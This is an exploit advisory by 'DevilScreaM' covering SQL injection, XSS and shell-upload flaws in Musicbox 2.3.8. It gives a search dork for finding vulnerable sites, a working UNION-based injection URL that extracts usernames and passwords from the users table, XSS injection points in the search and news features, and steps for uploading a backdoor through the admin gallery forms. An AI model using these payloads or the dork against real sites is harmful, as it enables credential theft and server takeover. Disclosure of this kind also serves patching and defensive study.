#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities #Author : DevilScreaM #Date : 25/08/2013 #Category : Web Applications #Vendor : http://www.musicboxv2.com/ #Version : 1.0 - 2.3.8 #Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 © 2008 inurl:genre_albums.php?id= #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability #Tested On : Windows 7 32 Bit (Mozila & Chrome) #Greetz : Newbie-Security.or.id SQL Injection Vulnerability http://site-target/genre_albums.php?id=[SQLI] Example http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- ========================================================================================== Cross site scripting / XSS Vulnerability *Search 1. Go To Fiture Search 2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search 3. See Result or See with URL http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0 Example http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0 ======================================================================================== *News Profile 1. Register To Website or go to link http://site-target/register.php 2. Login to Website 3. Go to Menu [ My News ] 4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1> And at Detials input your XSS or Text See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME] Example http://server/musicbox/member.php?uname=devilscream ========================================================================================== Shell Upload Vulnerability *Artist Galery 1. Go to Admin Page, And Login 2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php ============================================================================================ *Album Galery 1. Go to Admin Page, And Login 2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery 3. Select Option, Example Option "All Album", And Click Submit 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/album_gallery/Your_Backdoor.php ==========================================================================================Брой прочитания на тази страница: 1123
Musicbox 2.3.8 – Multiple Vulnerabilities